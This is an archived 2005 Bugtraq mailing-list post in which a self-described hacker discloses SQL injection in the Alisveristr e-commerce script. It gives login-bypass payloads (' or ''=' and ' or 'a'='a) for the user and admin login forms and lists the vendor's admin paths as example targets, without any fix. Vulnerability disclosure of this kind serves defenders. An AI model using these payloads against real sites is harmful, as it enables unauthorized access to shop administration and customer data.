lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20051203005331.5115.qmail@securityfocus.com> Date: 3 Dec 2005 00:53:31 -0000 From: B3g0k@...kermail.com To: bugtraq@...urityfocus.com Subject: Alisveristr E-Commerce Admin Login SQL İnjection ###Hi all ###B3g0k[at]hackermail.com ###Kurdish Hacker ###Special Thanx All Kurdish Hackers ###Freedom For Ocalan!!! ###----------------------------------- ###Alisveristr E-commerce User Login Sql İnjection ###Alisveristr E-commerce Admin Login Sql ###İnjection ###----------------------------------- ###Site: http://www.alisveristr.com or ###http://www.alisveris-tr.com ### ###Description: A E-Commerce scirpt it is too ###cool... :) User login Sql İnjection: Code 1 For User Login : Username : ' or ''=' Password: ' or ''=' Another User Login Sql İnjecition Username : ' or 'a'='a Password : ' or 'a'='a ---------------------------------- Now Admin login Sql injectoin ex: http://site.com/yonetim/default.asp http://www.alisveristr.com/yonetim http://www.alisveris-tr.com/yonetim Code 1 For Admin Login Username : ' or ''=' Password : ' or ''=' Code 2 For Admin Login : Username : ' or 'a'='a Password : ' or 'a'='a Thats it. Contact : B3g0k@...kermail.com Kurdish Hacker